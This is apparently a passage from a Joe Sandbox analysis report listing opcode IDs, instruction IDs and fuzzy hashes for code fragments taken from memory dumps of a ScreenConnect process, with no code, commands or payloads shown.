                                                                                                                                                                                                  • Instruction ID: 81aef5bf8a128db75e6acf65bd40aab7faa2a02e53369c27a34101fc333d2abd
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 05bae1cba6b099d126e2ea6608b681dcd2bc3af624a8b24b49f42f8c4dfac16f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0D31C370B041848FC70A9B68C850AAEFFB2EF8A340B1880A6D949DB395DA309D09C791
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1764259986.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: a725af7b2f5fefd0a2b73744b7a05068bf9792000a8539dec97f71ecd7e5c477
                                                                                                                                                                                                  • Instruction ID: c4582ab0ca0e3a297ebdccb2cefbd8e2341ae1a7bb1f3191bd996979c116affb
                                                                                                                                                                                                  • Opcode Fuzzy Hash: a725af7b2f5fefd0a2b73744b7a05068bf9792000a8539dec97f71ecd7e5c477
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 22313A30600705CFC770DF29D888A6AB7F6EF89625B144A1CD956CB7A1E730F905CB91
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1764259986.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 6297e53410b1bbea78b7b6d6c40f0aa1459d50b9f3e4b47e36771c14fb817cc7
                                                                                                                                                                                                  • Instruction ID: b0e53269f15ddc7d05d8783790702c079bec590c760ad05ad34e04a28f8af3e4
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6297e53410b1bbea78b7b6d6c40f0aa1459d50b9f3e4b47e36771c14fb817cc7
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0C313E32A0021ADFCB04DFA8E4449DEFBB2FF89718F158569D9057B260DB31691ACB94
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1764259986.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: d8d64cbbb89c0e656d9b9ce791ce368ca759cb9a94f64c30d804698ea9aa6246
                                                                                                                                                                                                  • Instruction ID: ba4343512abb0232f3cfe7eb8b4ad9bd1a24550497f9b266a878847bf724fb7f
                                                                                                                                                                                                  • Opcode Fuzzy Hash: d8d64cbbb89c0e656d9b9ce791ce368ca759cb9a94f64c30d804698ea9aa6246
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4521D235B003069BD704EB38D840ABEBBB2EBC9210F148529D419AB384DF30AD0987E1
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1764259986.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: e994e18308b99c9d27c6c4ea2ebbc4a9a9b00edd7b28bed978434e2fa386348c
                                                                                                                                                                                                  • Instruction ID: f3fe5e4a20ffdaecb22e6bad3297875211302ae1c9340643fab968b91417dc87
                                                                                                                                                                                                  • Opcode Fuzzy Hash: e994e18308b99c9d27c6c4ea2ebbc4a9a9b00edd7b28bed978434e2fa386348c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 102133305007059FDB38CF2AD848A56B7F5EF84714B008B1DD597976A1EB31E985CF80
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1764259986.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 905b0bbd78178889c906c5e4547ce6a1e62f04ef16bde65cf9f65206dc45c5e3
                                                                                                                                                                                                  • Instruction ID: e7029da3269284c535f2400725af999c03e0487290cdf6daeaf49349cbafebf8
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 905b0bbd78178889c906c5e4547ce6a1e62f04ef16bde65cf9f65206dc45c5e3
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 51119135B003059BDB04EB68D940B7EB7B6FBC9610F548528D509AB3C4EF70AD0987E6
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1764259986.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1763320196.000000000126D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0126D000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_126d000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 540fddf26505366f96dbed485726af1f1729609cb22208cf61e4bf4ec7d67db5
                                                                                                                                                                                                  • Instruction ID: eaee6141582faa1cb26f88b0f177e844673f540e478872aea009a336cb52a120
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 540fddf26505366f96dbed485726af1f1729609cb22208cf61e4bf4ec7d67db5
                                                                                                                                                                                                  • Instruction Fuzzy Hash: E001A73161434C9FFB204A95C984B66BF9CDF413A4F18C45AEE894A1C2C6799585CAB2
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1764259986.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 0684b1b75363105eba656464d853dcf9fa9cde0a1969a092e79fdf695b502208
                                                                                                                                                                                                  • Instruction ID: f340b98ba836e79da205f7202df8ab187c4b68760e2d1a6e5364fd6826145cd2
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0684b1b75363105eba656464d853dcf9fa9cde0a1969a092e79fdf695b502208
                                                                                                                                                                                                  • Instruction Fuzzy Hash: C601A230608384CFD33A9BB5E51CA267FB1EF4A52531680EADC498B267DB35DC42CB42
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1764259986.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: df5c778e720b60405842706e12bae1dea449a154a68e0b64b5efb26607f923a5
                                                                                                                                                                                                  • Instruction ID: e9fddb849024afba16ec94af2b59748b9050f45347c88c6c03ec6f159d2d8fb6
                                                                                                                                                                                                  • Opcode Fuzzy Hash: df5c778e720b60405842706e12bae1dea449a154a68e0b64b5efb26607f923a5
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 58F05836B082046BE728CAAEA400A9BBBEACBC4620B14C07FE54DC3680E931A5018764
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1764259986.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 590325c586b7a065389e469f8bef23b4a5b3402f001893adba3d33fc0c949a69
                                                                                                                                                                                                  • Instruction ID: 3eb9cf0ae4a6b332f68d69c8871bc775119d4037c572f178d3ee1b80923229e6
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 590325c586b7a065389e469f8bef23b4a5b3402f001893adba3d33fc0c949a69
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 85F024313007458FC752977CE4159EF3FE2DFC6650305816ED855CB610DA34AC4B8B80
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1763320196.000000000126D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0126D000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_126d000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 26bb08f3ff25de5695086ee0514c2c88b7cd5f1b11bb46bf864c775875a9d9b7
                                                                                                                                                                                                  • Instruction ID: e97f570e1f57e61fe83f2af1100e6e0ea4c2813ac017251af209cb600d1e7b3a
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 26bb08f3ff25de5695086ee0514c2c88b7cd5f1b11bb46bf864c775875a9d9b7
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2EF06271504348AFEB218A5AC9C4B66FF9CEB41764F18C55AEE884A2C7C2799844CAB1
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1764259986.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 16eee2c2a0d74efeb5ceea516722d8cc8ac41740251e138c3a7e31969f8895c8
                                                                                                                                                                                                  • Instruction ID: c9c3935f83882112b345371fe2e122fac64cd3e2e182374b2dd0c16b4911d33a
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 16eee2c2a0d74efeb5ceea516722d8cc8ac41740251e138c3a7e31969f8895c8
                                                                                                                                                                                                  • Instruction Fuzzy Hash: BEF0A736A0D3906FE755C7B9981259B7FE9CE85610704C0BFD09DC7141D52055038B34
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1764259986.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 5942e2b7ca0905623a9ab5969fb39a037a52f11423c526f177bd169ad0440727
                                                                                                                                                                                                  • Instruction ID: 3dc2b1dd88280cfe41d87a94909520fbb05d2a8fb6fa534cad10da60f5d8e18b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5942e2b7ca0905623a9ab5969fb39a037a52f11423c526f177bd169ad0440727
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 94F0247250C3D18FD312D778E8216A87FA0EE872143494ACFD0C5CF563D665E90B8352
Memory Dump Source
• Source File: 0000000B.00000002.1764259986.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 4970f14fc7632ba11910b7f7004c9b752deaefec6231fd1c2e71ce6d5c15238c
                                                                                                                                                                                                  • Instruction ID: a6ee09a297fd43ab7c5cf0f168b691287496db4a119113bac7a6873926045b41
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4970f14fc7632ba11910b7f7004c9b752deaefec6231fd1c2e71ce6d5c15238c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 51E08C3A3002149B8318AA7DF41C46F7AAAEBCD271315812AF50AC3388CF309C5287A1
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1764259986.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 2595f8cc819cb3a9339b184714edf81bc152dc9effcf4656759799ba5f434d0e
                                                                                                                                                                                                  • Instruction ID: 98ceafe15790e2a11ca23317ea12b05986daa84773b9dbd1c5fa48d92c8686f0
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2595f8cc819cb3a9339b184714edf81bc152dc9effcf4656759799ba5f434d0e
                                                                                                                                                                                                  • Instruction Fuzzy Hash: D0E0267040C2C00FC3028778E89D0C57FE0EF43224B9848CAD9C08B507E2215447C782
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1764259986.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 46bb88ea9e6ceab642e7adca2180835f02274b02883a69a7dd820a761f3de08c
                                                                                                                                                                                                  • Instruction ID: 5a702628393e6fe33cfb33a51437d2ef2760b606cd589b329f4875cd3c9e1160
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 46bb88ea9e6ceab642e7adca2180835f02274b02883a69a7dd820a761f3de08c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: ECE0262001C3C01FC302973498862D53FF4DF07224F4848D9D8C18E543C526A85BCBA3
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1764259986.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 0d9903c58417d0346320b18507599b611752f40eef42bd054d02abb29aab93c0
                                                                                                                                                                                                  • Instruction ID: 36436ecaebbe4ded560b33275ea91d06e0a12a20e4fcfa0dea1a354b8b1cc28c
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0d9903c58417d0346320b18507599b611752f40eef42bd054d02abb29aab93c0
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2ED05E70A0130CFFCB00DFA8F90459EB7B9EB45200B1041A8D808D3200EA316F549B81
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1764259986.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 772878430d6348586007895f51f585dec80f2af6fe3a103e0b4b116529d40605
                                                                                                                                                                                                  • Instruction ID: 9ea12b87cf6271b6ce0bf1fc8bb4d9149aef075194afc73dc245dde9979ccc89
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 772878430d6348586007895f51f585dec80f2af6fe3a103e0b4b116529d40605
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 81D05EB0A0130DEFCB40EFB4ED0065DB7B9EB4C200B1081A9D80CE3200EB316F149B91
                                                                                                                                                                                                  Strings
Memory Dump Source
• Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: t*Jt$t*Jt
                                                                                                                                                                                                  • API String ID: 0-3942707866
                                                                                                                                                                                                  • Opcode ID: b6548db560363f3c41baecb940bc1c71f16bf0508528b20b28466ddb571706e0
                                                                                                                                                                                                  • Instruction ID: 09f9756ee25574fcbf74629e8fac3306e8599fd05ce10fb7e298d40a9f8b699d
                                                                                                                                                                                                  • Opcode Fuzzy Hash: b6548db560363f3c41baecb940bc1c71f16bf0508528b20b28466ddb571706e0
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9F11C471F0020DAFEB55CA69CC00AABB7F6BFC4704F14C465D528E7295E7719A41CB90
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: d
                                                                                                                                                                                                  • API String ID: 0-2564639436
                                                                                                                                                                                                  • Opcode ID: d1956814eea4d8b6b850b039470a260d3a47ae2927232ef84f74eecb7a4a35c2
                                                                                                                                                                                                  • Instruction ID: 3ffa4d51da6555415b6874def23347d16524db5da972824d8cdf9f9514e142de
                                                                                                                                                                                                  • Opcode Fuzzy Hash: d1956814eea4d8b6b850b039470a260d3a47ae2927232ef84f74eecb7a4a35c2
                                                                                                                                                                                                  • Instruction Fuzzy Hash: CAD17F74A40709CFCB95DF68C884A99B7B2FF49310B118659EA19AB365DB30ED85CF80
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: U
                                                                                                                                                                                                  • API String ID: 0-3372436214
                                                                                                                                                                                                  • Opcode ID: a18cfa2abf13738a571d1491c3d4c18d0939d71874bad5a4758ce963089dd8ca
                                                                                                                                                                                                  • Instruction ID: 3ff45eeff667fd7e6bc101524169db10262010f3cc9e0ebcc80a093d6a0a8c56
                                                                                                                                                                                                  • Opcode Fuzzy Hash: a18cfa2abf13738a571d1491c3d4c18d0939d71874bad5a4758ce963089dd8ca
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6D51E330A00219CFDB6A9B68D864B6EBBF2BF84711F14C969D856DB2D1DB309D44C790
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: (
                                                                                                                                                                                                  • API String ID: 0-1334834377
                                                                                                                                                                                                  • Opcode ID: 5382c37ac3362e23916d47e88610fe71b5d1576b2cf2a6af5de43d6445f8184b
                                                                                                                                                                                                  • Instruction ID: 11712deef64877749054abf1fbf01e051cdf46fc01f34c53c811ed539056f951
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5382c37ac3362e23916d47e88610fe71b5d1576b2cf2a6af5de43d6445f8184b
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8031CF30B0031A9BCB96EB69D85466FB3E2FFC92107108629D919DB344EF70ED058BD5
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: (
                                                                                                                                                                                                  • API String ID: 0-1334834377
                                                                                                                                                                                                  • Opcode ID: 090442ab38034a4481c98fd99120d2f471ade52fb43b7549a0e31c244d771af6
                                                                                                                                                                                                  • Instruction ID: 48875d151ecab23f22f4b42b9652a9c2c3221d3f600e445552a05cccf2cb1c6f
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 090442ab38034a4481c98fd99120d2f471ade52fb43b7549a0e31c244d771af6
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4831C131B0031A9B8B96EB79D85456FB3E6FFC92103108629D909DB344EF70ED058BD5
                                                                                                                                                                                                  Strings
Memory Dump Source
• Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  • Instruction ID: 574c038db5f60802e9578b3c1fa7264f58162e822ee2a3004fb72ce182b7a5d9
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ca548f71db2f8a4ae57e63bb28ae65ddbd71cbde0c63624f3ac2a34a9c595ec4
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5951923070020A8FDB95EB39D95866E77E2AF88710B14846CD906DB3A5EF74DD01CFA1
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: a5c168e5ff2fb2c7899d927c9fea294b302c6019c48a9248f94292dcc5424507
                                                                                                                                                                                                  • Instruction ID: f8061a42ae5c1239b6745d8a1259bda0b9d296097fbdc791e243c88ea73a01ec
                                                                                                                                                                                                  • Opcode Fuzzy Hash: a5c168e5ff2fb2c7899d927c9fea294b302c6019c48a9248f94292dcc5424507
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1A518970E403099FEB45DFB4D884BDDBBB1FF89310F108559E104AB294EB75A955CB60
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 09c921bfa783516cab791b75a601c86b656f6acec657776ca4e869b99f0ef7b0
                                                                                                                                                                                                  • Instruction ID: 58a04c85a74ade70a20695f25aac61e6325b91a5775c3633b5365d55197057e2
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 09c921bfa783516cab791b75a601c86b656f6acec657776ca4e869b99f0ef7b0
                                                                                                                                                                                                  • Instruction Fuzzy Hash: C2516770E402099FEB44DFB4D884BEDB7B2FF88300F108659E104AB294EB75A995CF90
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 88b022226554cd2a83c1687adb3422fe579d2af84d8ea5e025e82b529b3de45b
                                                                                                                                                                                                  • Instruction ID: 76a66571675698cf614a974f3bf5781cf7de9fd1de23438514cae387999215ef
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 88b022226554cd2a83c1687adb3422fe579d2af84d8ea5e025e82b529b3de45b
                                                                                                                                                                                                  • Instruction Fuzzy Hash: F541D135A00209CFDB56EF68D8946AEFB66FFC4310B15C129D906AB385DB30ED06CB91
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: ee31c6eac5ccb8428b5b025edb676f7a22e1c9c22e38156fe04ae11d8687a67c
                                                                                                                                                                                                  • Instruction ID: 0d761ff99dce3214688d519ba81ce0fcdb6f3e27303849151f4bbb311804d86d
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ee31c6eac5ccb8428b5b025edb676f7a22e1c9c22e38156fe04ae11d8687a67c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: BE418C30B10209CFCB55DF69D894AAEB7F6BF88314B158568E40AEB3A1DF709D45CB90
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 700530855f5399e9d554c1f59da06719dd4aa81bdd049f617a61e63c08769845
                                                                                                                                                                                                  • Instruction ID: 15b7d69ccb13fb0122a3b54f5257c7cdfcde52b0a6185cb814c6f5d28a516f80
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 700530855f5399e9d554c1f59da06719dd4aa81bdd049f617a61e63c08769845
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 34418C71E003199FEB61DF69CC18BAABBB6FB45310F1081E9D60CA7280DB745A45CF92
                                                                                                                                                                                                  Memory Dump Source
